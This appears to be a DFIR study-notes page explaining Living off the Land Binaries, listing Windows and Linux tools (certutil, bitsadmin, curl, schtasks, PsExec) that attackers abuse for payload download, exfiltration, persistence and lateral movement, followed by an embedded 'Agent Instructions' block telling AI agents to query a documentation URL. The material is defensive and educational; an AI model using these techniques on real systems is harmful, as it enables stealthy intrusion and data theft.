# Living off the Land Binaries (LOLBins)

**Living off the Land Binaries (LOLBins)** are legitimate, pre-installed executables and scripts on an operating system that adversaries abuse to perform malicious actions without introducing external malicious code or tools. This tactic helps attackers evade detection, as these binaries are typically trusted and signed by the operating system vendor

#### Key Characteristics:

1. **Legitimacy**: LOLBins are part of the operating system or other installed software and have legitimate uses.
2. **Trust**: Security solutions and administrators often trust these files, making their malicious use less suspicious.
3. **Flexibility**: These binaries can perform a wide range of actions, such as downloading files, executing commands, or interacting with system resources

#### Examples of LOLBins:

**On Windows:**

* **`cmd.exe` / `powershell.exe`**: Used to execute scripts or commands.
* **`reg.exe`**: Manipulates the Windows registry.
* **`mshta.exe`**: Executes HTML applications and can run malicious scripts.
* **`rundll32.exe`**: Executes DLLs or functions, often abused to run malicious code.
* **`certutil.exe`**: Retrieves and decodes certificates, often abused for downloading files.
* **`schtasks.exe`**: Creates scheduled tasks for persistence or execution

**On Linux:**

* **`bash`**: Executes shell commands and scripts.
* **`wget` / `curl`**: Downloads files or communicates with remote servers.
* **`find`**: Executes other commands via the `-exec` flag.
* **`cron`**: Used for scheduling tasks (persistence)

Here is example the attacker can use legitimate pre-installed tool to download malicious file

<figure><img src="/files/y2jmGfZXz55v4k3u43bN" alt=""><figcaption></figcaption></figure>

#### Common Malicious Activities with LOLBins:

1. **cExecution**:
   * Run scripts or commands (e.g., using `PowerShell` or `cmd.exe`).
2. **File Download**:
   * Use tools like `CertUtil` or `bitsadmin` to fetch payloads from remote servers.
3. **Data Exfiltration**:
   * Transfer stolen data using `PowerShell` or `ftp.exe`.
4. **Persistence**:
   * Use utilities like `schtasks` to create scheduled tasks for re-execution.
5. **Lateral Movement**:
   * Use `PsExec` or `wmic` to execute commands on remote systems.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://mahmoud-shaker.gitbook.io/dfir-notes/living-off-the-land-binaries-lolbins.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.